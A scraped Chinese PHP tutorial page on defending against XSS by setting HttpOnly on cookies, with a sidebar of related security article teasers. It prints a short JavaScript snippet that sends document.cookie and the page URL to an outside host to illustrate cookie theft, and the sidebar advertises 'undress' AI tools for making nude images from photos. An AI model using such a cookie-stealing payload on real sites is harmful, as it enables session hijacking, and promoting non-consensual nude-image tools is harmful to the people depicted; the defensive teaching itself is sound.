xss防御之php利用httponly防xss攻击_php实例
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
How to protect against cross-site scripting (XSS) attacks using PHP
Jun 29, 2023 am 10:46 AM
How to Use PHP to Defend Cross-Site Scripting (XSS) Attacks With the rapid development of the Internet, Cross-SiteScripting (XSS) attacks are one of the most common network security threats. XSS attacks mainly achieve the purpose of obtaining user sensitive information and stealing user accounts by injecting malicious scripts into web pages. To protect the security of user data, developers should take appropriate measures to defend against XSS attacks. This article will introduce some commonly used PHP technologies to defend against XSS attacks.
How do XSS vulnerabilities work?
Feb 19, 2024 pm 07:31 PM
What is the principle of XSS attack? Specific code examples are needed. With the popularity and development of the Internet, the security of Web applications has gradually become the focus of attention. Among them, Cross-SiteScripting (XSS for short) is a common security vulnerability that web developers must pay attention to. XSS attacks are performed by injecting malicious script code into a Web page and executing it in the user's browser. This allows the attacker to control the user's browser and obtain the user's sensitive information.
How Codeql analyzes the problem of cookie not enabling httponly
May 17, 2023 pm 05:25 PM
Preface Today we use codeql to analyze security issues such as "cookie is not enabled httponly", thereby deepening our use of codeql. If the response is good, you can consider exploring other vulnerabilities in Vulnerability-goapp. When analyzing go programs, you must additionally download the codeql-go description audit object Vulnerability-goapp: VulnerablegolangWebapplicationforeducation. Modification: Because all cookies in this project are not set to http-only, there is no comparison, so we need to modify it first. in some cookies
How to set HttpOnly Cookie in Java?
Apr 22, 2023 pm 06:37 PM
Httponlycookie is a cookie security solution. In browsers that support httponlycookie (IE6+, FF3.0+), if the "httponly" attribute is set in the cookie, the JavaScript script will not be able to read the cookie information, which can effectively prevent XSS attacks and make website applications more secure. However, J2EE4 and J2EE5 cookies do not provide a method to set the httponly attribute, so if you need to set the httponly attribute, you need to handle it yourself. importjavax.servlet.http.Cookie;importjavax.serv
PHP data filtering: preventing XSS and CSRF attacks
Jul 29, 2023 pm 03:33 PM
PHP Data Filtering: Preventing XSS and CSRF Attacks With the development of the Internet, network security has become one of the focuses of people's attention. In website development, it is very important to filter and verify user-submitted data, especially to prevent XSS (cross-site scripting attacks) and CSRF (cross-site request forgery attacks) attacks. This article will introduce how to use PHP to prevent these two common security vulnerabilities and provide some sample code for reference. Preventing XSS attacks XSS attacks refer to malicious attackers injecting malicious scripts or codes to tamper with
Cross-site scripting (XSS) attack prevention in Go: best practices and tips
Jun 17, 2023 pm 12:46 PM
With the rapid development of the Internet, website security issues have become a major problem in the online world. Cross-site scripting (XSS) attack is a common security vulnerability that exploits website weaknesses to inject malicious scripts into web pages to steal and tamper with user information. As an efficient and safe programming language, Go language provides us with powerful tools and techniques to prevent XSS attacks. This article will introduce some best practices and techniques to help Go language developers effectively prevent and resolve XSS attacks. for all inputs
Common network security issues and solutions in Java development
Oct 09, 2023 pm 06:36 PM
Summary of common network security issues and solutions in Java development: With the popularization of the Internet, network security issues have become increasingly prominent. During Java development, we need to consider how to protect the security of network communications. This article will introduce some common network security problems and provide corresponding solutions and code examples. 1. Cross-site scripting attack (XSS) XSS attack refers to an attack method that obtains user sensitive information by injecting malicious scripts into web pages. To prevent XSS attacks, we can use regular input checking
How to avoid SQL injection and XSS attacks in PHP language development?
Jun 09, 2023 pm 06:27 PM
As the Internet becomes more and more widely used, security issues become more and more noticeable. In PHP development, SQL injection and XSS attacks are the two most common security issues. This article explains how to avoid both attacks. 1. What is SQL injection? SQL injection refers to an attacker exploiting web application vulnerabilities to cause the database server to run in a manner beyond the original design intention by entering SQL instructions. Attackers can use these vulnerabilities to perform malicious operations, such as reading and writing data, obtaining administrator privileges, etc. 2. How to avoid
